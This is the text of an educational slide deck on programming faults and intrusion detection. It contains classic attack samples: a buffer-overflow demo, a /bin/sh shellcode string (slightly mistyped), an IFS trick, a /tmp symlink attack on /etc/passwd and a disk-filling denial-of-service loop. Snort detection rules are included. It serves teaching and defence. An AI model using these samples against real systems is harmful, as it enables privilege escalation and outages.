Transcript Programming Faults

Programming Faults
Programming Errors that Lead to
Compromised Systems
Definition of Information
Security
• Confidentiality == assurance that
information is not disclosed to unauthorized
entities or processes
• Integrity == quality of an information
system that reflects its logical correctness
and reliability
• Availability == timely, reliable access to
data and information services for authorized
users
Definition of a Fault
• Fault == defect that does not change state
• Failure == manifestation of a fault
• “A programming mistake is a latent fault
until that code is invoked by the system.”
• “If a fault affects the delivered service, a
failure occurs.”
Programming Faults and
Intrusion Detection
• Intrusion Detection Systems monitor for
attempts to exploit Programming Faults
• Exploits become rules in signature
databases used by IDS software to detect
the failures caused by activating the flaws
Confidentiality Faults
•
•
•
•
•
Buffer Overruns
Environment Variables
Interactive Input
Handling Sensitive Data
Executing Other Programs
Buffer Overruns
• Subvert the normal course of execution to
execute code written by the cracker
• Exploit root privileged programs to gain
root authority
• Result of mismanaging arrays and pointers
(mostly character arrays)
• Write past the end of the buffer to overwrite
other data in memory
• Two types of buffers - static and dynamic
• Dynamic buffers are allocated from the
stack at run time
• As part of the stack, they are in the same
area of memory as data used by kernels in
OSes which do not maintain separate user
and kernel modes
void function (char *str) {
char buffer[16];
strcpy(buffer, str);
}
void main() {
char large_string[256]; int i
for (i=0; i<255; i++)
large_string[i]=‘A’;
function(large_string);
}
top of stack
bottom of memory
<------------------------------<
|Buffer Sfp Ret *Str
|. . .
|[
][ ] [ ] [
] |. . .
<------------------------------<
top of memory
bottom of stack
#include <stdio.h>
void main() {
char *name[2];
name[0] = “/bin/sh”;
name[1] = “NULL;
execve(name[0], name, NULL);
}
char shellcode[] =
“\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00]x00\x00”
“\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80”
“\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff”
“\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3”;
Buffer Overruns and IDS
• If the IDS captures a long series of NOOPs being
transmitted to a protected system, it should flag
that as a potential exploit attempt.
• alert ip $EXTERNAL_NET any ->
$HOME_NET $SHELLCODE_PORTS
(msg:"SHELLCODE x86 NOOP";
content: "|90 90 90 90 90 90 90 90
90 90 90 90 90 90|"; depth: 128;
reference:arachnids,181;
classtype:shellcode-detect;
sid:648; rev:5;)
Environment Variables
• Environment variables are sources of user
input
• Depending on how a program handles the
variable, it’s possible to insert an exploit to
either cause a failure, or to take advantage
of poor logic
Suppose IFS (variable to control whitespace
designator) is set to ‘/’ (the pathname
seperator).
Then
exec(“/bin/sh”,”-c”,”/bin/mail userbob”);
Becomes
bin mail userbob
Environment Variables and IDS
• If the IDS detects an IFS setting being
transmitted to a protected system, should it
flag that as a potential exploit attempt?
Integrity Flaws
•
•
•
•
•
Executing Input
Links
Regular Files
Race Conditions
Resource Sharing
Executing Input
• From an old version of a web browser:
sprintf(buf, telnet %s”, resid_url);
system(buf);
• Internet clients that try to be helpful by
downloading & executing content.
User Input and IDS
• Formatted commands to network services make
good signatures for IDS.
• alert tcp $EXTERNAL_NET any ->
$SQL_SERVERS 139 (msg:"MS-SQL/SMB
xp_cmdshell program execution";
content:
"x|00|p|00|_|00|c|00|m|00|d|00|s|00|h|0
0|e|00|l|00|l|00|"; nocase;
flow:to_server,established; offset:32;
classtype:attempted-user; sid:681;
rev:4;)
Links
• Replace a temporary file used by a
privileged program with a link to another
file.
• Can capture data, or trick the program into
corrupting system files.
• Ex: suppose /tmp/abc123 is used by a root
program and to temporarily store data.
• If the program doesn’t verify that
/tmp/abc123 doesn’t already exist, a user
can pre-create /tmp/abc123 -> /etc/passwd.
• The program follows the link, and clobbers
the password file.
File Manipulations and IDS
• How can a network device tell the
difference between creating a link to exploit
a program, or creating a link to create a
link?
• Host Based IDS are required to detect file
changes (ie file integrity checkers).
Availability Faults
•
•
•
•
•
Local System DOS
Network DOS
Buffer Overruns
System Overload
Spoofing
Local System DOS
• Fill up the filesystem
int main() {
int ifd;
char buf[8192];
ifd=open(“./attack”, O_WRITE|O_CREATE,
0777);
unlink(“./attack”);
while(1) write(ifd, buf, sizeof(buf));
}
• Use up inodes, fill up the process table, use up
memory…
Local DOS and IDS
• Look for error messages indicating system
problems.
• Good system administration practices
probably more important.
Filesystem monitoring
Memory statistics monitoring
CPU load monitoring
…
Network DOS
• Manipulate the network protocols to cause a
failure on the target.
• Ex: >6 bytes data in a SYN packet
• Ex: ICMP ECHO requests > 65507 octets
• Ex: setting packet header flags to
nonsensical values
• …
• More often than not protocols and standards
are not properly or fully implemented,
creating flaws that lead to denial of service.
• RFCs provide the structure and behavior
guidelines; following the RFC reduces
flaws; testing the RFC finds the flaws.
Network DOS and IDS
• Use the IDS to monitor network traffic for
packets in unexpected parts of network;
malformed packets; or just certain types of
packets.
• alert icmp $EXTERNAL_NET any ->
$HOME_NET any (msg:"ICMP Address
Mask Request"; itype: 17; icode:
0; sid:388; classtype:miscactivity; rev:4;)
Conclusion(s)
• Use good programming techniques to avoid
perpetuating the same old flaws.
• The same flaws that existed in the dawn of
the Internet still exist. Example - the Morris
Worm and the Blaster Worm used the same
techniques to exploit a system and spread
themselves to other systems.
• IDS systems, network based and host based,
are an important layer in the Defense-inDepth approach to good information
security.
• IDS systems also make good system
administration tools.
Works Consulted
• Aleph One. Smashing the Stack for Fun
and Profit. Phrack. Vol 7, Num 49.
• Forbes, Liam. Secure Programming in the
UNIX Environment. UAF CS Dept., 1998.
• Patterson, David A. An Introduction to
Dependability. ;login: The Magazine of
USENIX & SAGE. August 2002, Vol 27,
Num 4.